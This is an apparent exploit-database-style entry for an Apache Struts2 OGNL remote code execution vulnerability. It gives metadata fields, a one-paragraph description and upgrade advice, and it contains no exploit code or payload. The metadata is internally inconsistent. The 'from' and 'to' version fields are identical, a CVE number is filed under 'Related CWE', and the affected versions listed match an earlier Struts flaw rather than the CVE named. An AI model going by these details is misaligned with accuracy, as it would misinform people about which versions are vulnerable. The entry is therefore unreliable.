Vendor: Struts2
By: hook-s3c
CVSS: 8.1 (HIGH)
Type: Remote Code Execution
CWE: 94
Product Name: Struts2
Affected Version From: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
Affected Version To: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
Patch Exists: YES
Related CWE: CVE-2018-11776
CPE: a:apache:struts:2.3.5
Other Scripts: N/A
Platforms Tested: Linux, Windows, Mac
Year: 2018
Struts2 Remote Code Execution Vulnerability
The Struts2 Remote Code Execution Vulnerability is a flaw in Apache Struts2 that allows an attacker to execute arbitrary code on the server. The exploit uses a malicious OGNL expression to run arbitrary commands on the server, and it is triggered when the vulnerable application receives a request containing that expression.
Mitigation:
The best way to mitigate this vulnerability is to upgrade to the latest version of Apache Struts2. The application should also be kept current with the latest security patches and monitored regularly for suspicious activity.